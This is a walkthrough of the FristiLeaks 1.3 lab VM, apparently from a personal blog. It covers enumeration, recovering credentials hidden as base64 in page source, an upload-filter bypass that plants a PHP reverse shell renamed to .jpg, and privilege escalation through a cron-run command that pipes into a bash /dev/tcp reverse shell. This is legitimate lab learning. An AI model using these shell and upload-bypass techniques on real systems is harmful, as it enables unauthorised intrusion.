Fristi Leaks

Fristi Leaks 1.3

Enumeration

Started out with a basic nmap all ports t4 timing and service detection.

nmap -p- -sV -t4 10.0.0.159

Below you can see the full output. full output

We’ve got Port 80 open time to explore a web app. drinkfristi

So much pink let’s run a nikto and start poking around. Fristinikto

While nikto was running I curled the robot.txt fristibots

From that we see the /cola/ /sisi/ /beer/ directories going to those takes me to a Jedi! droids

I didn’t know what sisi was ?? I did know that beer and cola where drinks though. The webpage said to stay calm and drink fristi so I wonder if /fristi/ exists. adminpanel

I doubt I need to brute force this. I must have missed something. I went back to the webpage and viewed the source hoping for a hint at a user name or something. eezee

Cool a note from the dev that never got cleaned up for production. It looks like they are using base64 for image encoding. When you Scroll to the bottom theres another message. base64message

We know that the dev was using base64 for images so I use the base64 util from the coreutils gnu package. base64 decode

Lets open up image.png and see if it decoded into something we can use. password

That is a lot of K’s lets see if we can use the user eezeepz and the List of K’s and e’s we just found.

loggedin Sweet Logged into the web app lets find a way to get a local shell with that upload button.

Local

Playing with the upload button burnt a lot of my time and I learned a major lesson. I need to drill it into my head to try easy stuff first. webbypass

I Ended up spending like an hour researching how to bypass upload filters besides renaming backdoor.php to backdoor.php.jpg I never even tried it because I assumed that it wouldn’t work. I figured Fristileaks was from around 2015 or so and it had to have some sort of new trick to learn. I got mad at myself for not trying it first.

On Kali by default there are several php web shells in the /usr/share/webshells/php directory. You need to go in and change you port and IP on these and then for this particular shell use cp /usr/share/webshells/php/php-reverse-shell.php webshell.php.jpg this will use the copy command and create a new version with a .jpg extension at the end. listener

Then upload you webshell with the upload button. wedidit

Then browse to /uploads! whomp

Whoops! No Directory indexing so lets try to call the php renamed to jpg manually. uploads

And Lets Check out our listener. local

Local Dance! On to enumeration 2.0 for all the priv esc things!

Priv Esc

Well no tty shell so we need to spawn one of those. I tried to spawn with bash and vi but neither worked so python it is.

python -c 'import pty; pty.spawn("/bin/sh")

Hmmmmm? What’s wrong with that? Lets see if we can find our python binary as our path looked funky via env anyway.

whereis python

Looks like there is one in /usr/bin lets try it this time.

/usr/bin/python2 -c 'import pty; pty.spawn("/bin/sh")

Awesome We should have a full tty shell now.

There is a note in eezeepz home dir from the admin he has privs to certain bins and “be sure to call the full path and place the the commands into the /tmp folder and they will run”

I created a listener and used those binaries to pipe into a bash reverse shell.

/home/admin/echo | bash -i >& /dev/tcp/10.0.0.130/5567 0>&1

adminshell

So that Got me to be able to poke around /home/admin

I could now see the cronjob and cryptedpass.txt and fristigod with a whoisyourgodnow.txt file ?

Looking at cryptpass.py you can see it does base64 and then rot13. I tried a couple decoders I use frequently but ultimately decided it would just be easier to reverse the python code to reverse the encryption. I looked at the libraries that were imported with the original script to understand everything that was going on and then wrote something quick and dirty.

#!/usr/bin/python

import codecs,base64,sys
d = codecs.decode('=RFn0AKnlMHMPIzpyuTI0ITG'[::-1], 'rot13')
u = base64.b64decode(d)
print u

Running my script gets the following output. output

And sudo -l gave me a dir to a do command script. root

The flag for good measure! Done

Lessons Learned

Make sure to try the basic stuff first. If anything this box taught me that. Don’t assume the since it looks easy there is going to be an additional layer of difficulty stacked on top of the local shell staring you in the face.

Enumeration is always key!

I had never really had to use sudo -u before handy to know and caused me to read the sudo man page again. I don’t know what I would do without Man pages. Good Documentation and RTFM! Is worth its weight in gold.